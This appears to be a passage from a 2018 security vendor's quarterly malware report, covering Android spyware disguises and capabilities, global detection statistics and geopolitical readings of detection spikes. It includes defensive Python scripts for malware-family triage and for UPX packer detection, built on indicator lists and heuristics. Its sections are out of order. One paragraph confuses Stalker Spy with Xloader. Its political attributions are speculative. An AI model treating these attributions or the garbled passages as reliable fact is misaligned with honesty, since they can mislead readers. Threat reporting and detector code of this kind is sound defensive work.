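PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")   # strings(1)-style: printable ASCII runs of 4+


def extract_strings(blob):
    """Return the set of printable ASCII strings found in a raw file image."""
    return {m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(blob)}


def indicator_hits(strings, indicators):
    """Indicators that occur inside any string, in dotted (com.kbstar.kbbank) or
    Dalvik descriptor (Lcom/kbstar/kbbank;) form."""
    hits = set()
    for ind in indicators:
        slashed = ind.replace(".", "/")
        if any(ind in s or slashed in s for s in strings):
            hits.add(ind)
    return hits


def match_families(strings, min_hits=2):
    """Map family -> (coverage ratio, sorted hits) for every family with >= min_hits hits."""
    result = {}
    for family, indicators in FAMILY_INDICATORS.items():
        hits = indicator_hits(strings, indicators)
        if len(hits) >= min_hits:
            result[family] = (len(hits) / len(indicators), sorted(hits))
    return result


def triage(blob):
    """Best-matching family (or None) plus the full per-family breakdown."""
    matches = match_families(extract_strings(blob))
    if not matches:
        return None, {}
    best = max(matches, key=lambda f: matches[f][0])
    return best, matches


# Constructed sample images (not real malware): fragments of what a strings dump of a
# classes.dex would contain in each case.
SAMPLE_XLOADER = (b"dex\n035\0" + b"\x01\x7f\0" +
                  b"Lcom/kbstar/kbbank;\0Lcom/shinhan/sbanking;\0nh.smart\0"
                  b"android/content/pm/PackageManager\0")
SAMPLE_MYSTERYBOT = b"dex\n035\0Send_SMS\0Start_Inject\0Forward_call\0Gethistory\0"
SAMPLE_BENIGN = b"dex\n035\0android.intent.action.MAIN\0com.example.notes\0"

if __name__ == "__main__":
    for label, blob in (("xloader", SAMPLE_XLOADER), ("mysterybot", SAMPLE_MYSTERYBOT),
                        ("benign", SAMPLE_BENIGN)):
        print(label, triage(blob))
```

A family is reported only when two or more of its indicators hit. Package-name matches alone are weak evidence, since a legitimate security or account-aggregator app may also reference bank packages, so treat the output as a lead for manual analysis rather than a verdict, and refresh the indicator sets as the families change their target lists.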

4.1.9 Hero Rat

The next digital spook, Hero Rat, is active mostly in Iran. It uses third-party app stores, social networks and messengers for spreading.

Disguises of Hero Rat (Version 1): CloudVPN, MyIrancel, Mtproto, زیبانویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available via a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If you tap this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises shown above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which improves on its mining capability. It is disseminated via the counterfeit apps listed below, but one of the vectors is especially interesting.

Disguises of CoinHive:
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April (chart; y-axis 0 to 180,000)

4.2.2 May 2018

Android-targeted malware in May (chart; y-axis 0 to 500,000)

4.2.3 June 2018

Android-targeted malware in June (chart; y-axis 0 to 300,000)

5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network-facing software as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them over a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they spread by mailing copies of themselves from victim computers, often to addresses harvested from the infected host, and some variants also travel via exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella p2p protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known IM Worm Yahos, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks using Yahos.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected in Q2 2018 was DarkComet (also written Dark Komet), a remote access trojan (RAT) that is a full 10 years old. This malware allows an attacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb", for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (.exe) and HTML (.html) files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign programs. Typically Trojans grant remote attackers the same rights and privileges as the local user and can be used for many kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrators group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the top country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

Exploit detections are comparatively rare, as the underlying vulnerabilities are typically patched quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo targeted a favourite of attackers, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating system.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the top constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that this malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing, or "packing", it inside larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data usually carries its own decompression stub, or is a self-extracting archive, which recreates the original code from the compressed form and then executes the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.

MUPX, or Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous file formats and operating systems and uses the open-source UCL compression algorithm, whose decompressor is just a few hundred bytes of code; the modified builds seen in malware typically alter the stock packer's layout or signatures so that the standard unpacker no longer recognizes the file.

In Q2 2018 Russia was the top home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
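As an added example that is not part of the report, the following Python script implements the structural checks an analyst uses to spot UPX-packed and "MUPX"-style modified-UPX binaries without relying on a signature database: it walks the PE section table, flags the stock UPX0/UPX1 section names, flags the characteristic section that has no data on disk but a large virtual size (where the unpacking stub rebuilds the original image at runtime), and measures per-section Shannon entropy, since compressed payloads sit close to 8 bits per byte. Because renaming sections is the most common UPX modification, the verdict does not depend on names alone. The build_pe helper and the three sample images are constructed fixtures for the example, not real malware.

```python
import math
import struct

SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
UPX_NAMES = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY = 7.0             # bits per byte; compressed or encrypted data is close to 8.0


def shannon_entropy(data):
    """Entropy of `data` in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk DOS -> PE -> COFF headers; return (name, vsize, rawsize, raw_bytes) per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size          # section table follows the optional header
    sections = []
    for i in range(num_sections):
        f = struct.unpack_from(SECTION_FMT, pe, table + 40 * i)
        name = f[0].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rawsize, rawptr = f[1:5]
        sections.append((name, vsize, rawsize, pe[rawptr:rawptr + rawsize]))
    return sections


def packer_indicators(pe):
    """Set of heuristics that fire on the image."""
    hits = set()
    for name, vsize, rawsize, raw in parse_sections(pe):
        if name in UPX_NAMES:
            hits.add("upx_section_names")
        if rawsize == 0 and vsize >= 0x1000:      # UPX0 pattern: empty on disk, filled at runtime
            hits.add("empty_raw_large_virtual")
        if shannon_entropy(raw) > HIGH_ENTROPY:   # compressed payload (UPX1 pattern)
            hits.add("high_entropy_section")
    return hits


def looks_packed(pe):
    """Stock UPX names are conclusive; otherwise require two independent structural signs."""
    hits = packer_indicators(pe)
    return "upx_section_names" in hits or len(hits) >= 2


def build_pe(sections):
    """Fixture builder: a minimal PE32 image from (name, virtual_size, raw_bytes) tuples."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                 # e_lfanew = 64
    opt = struct.pack("<H", 0x10B) + b"\0" * 222                        # PE32 magic, rest zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    raw_ptr = (64 + 4 + 20 + len(opt) + 40 * len(sections) + 511) // 512 * 512
    vaddr, table, blobs = 0x1000, b"", b""
    for name, vsize, raw in sections:
        ptr = raw_ptr + len(blobs) if raw else 0
        table += struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"), vsize, vaddr,
                             len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += raw
        vaddr += (max(vsize, len(raw)) + 0xFFF) // 0x1000 * 0x1000
    return (dos + b"PE\0\0" + coff + opt + table).ljust(raw_ptr, b"\0") + blobs


# Constructed samples (not real malware). A full byte ramp stands in for compressed
# payload: its entropy is exactly 8.0 bits per byte.
COMPRESSED = bytes(range(256)) * 16
STOCK_UPX = build_pe([("UPX0", 0x8000, b""), ("UPX1", 0x2000, COMPRESSED)])
MODIFIED_UPX = build_pe([(".text", 0x8000, b""), (".data", 0x2000, COMPRESSED)])   # names scrubbed
PLAIN = build_pe([(".text", 0x1000, b"\x90" * 2048 + b"Hello, world\0" * 16),
                  (".data", 0x200, b"\0" * 512)])

if __name__ == "__main__":
    for label, image in (("stock UPX", STOCK_UPX), ("modified UPX", MODIFIED_UPX), ("plain", PLAIN)):
        print(f"{label:13s} packed={looks_packed(image)} {sorted(packer_indicators(image))}")
```

The entropy check on its own is a weak signal: legitimate executables that embed compressed resources, images or certificates also carry high-entropy sections, which is why the verdict requires the empty-on-disk section as a second, independent structural sign, and why a positive result should be confirmed by unpacking (or by inspecting the entry point for the decompression stub) before the sample is labelled.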


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile

The top two countries for Virtual Tools detections were Germany and the US

This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation, or "cracking", software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions.

Disguises of Zoo Park:
- Version 1: Telegram Groups, انتخاب دھم
- Version 2: Postrall, Yes For Referendum, انتخاب دھم
- Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
- Version 4: VPN Easy, DroFirewall, m_android

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attacker's server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:
- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the applications installed
- Collect the browser's data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of previous versions, it includes some additional tricks:
- Extracts photos, audio and videos
- Records the screen
- Executes shell commands
- Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Disguises of MikeSpy: Virtual Girlfriend

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
- Takes control over the Bluetooth Adapter
- Extracts data about accounts, contacts details and installed apps
- Extracts data from the WhatsApp Message DB and related keys
- Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Disguises of Xloader: Version 1 to Version 3: FaceBook, Chrome


After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contacts details
- Set Wi-Fi always turned on

Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls

4.1.5 Stalker Spy

The next malware in our list is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Disguises of Stalker Spy (App: Distribution)
- FlexiSpy: MBackup
- HelloSpy: ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
- Mobile Spy: 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android, CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

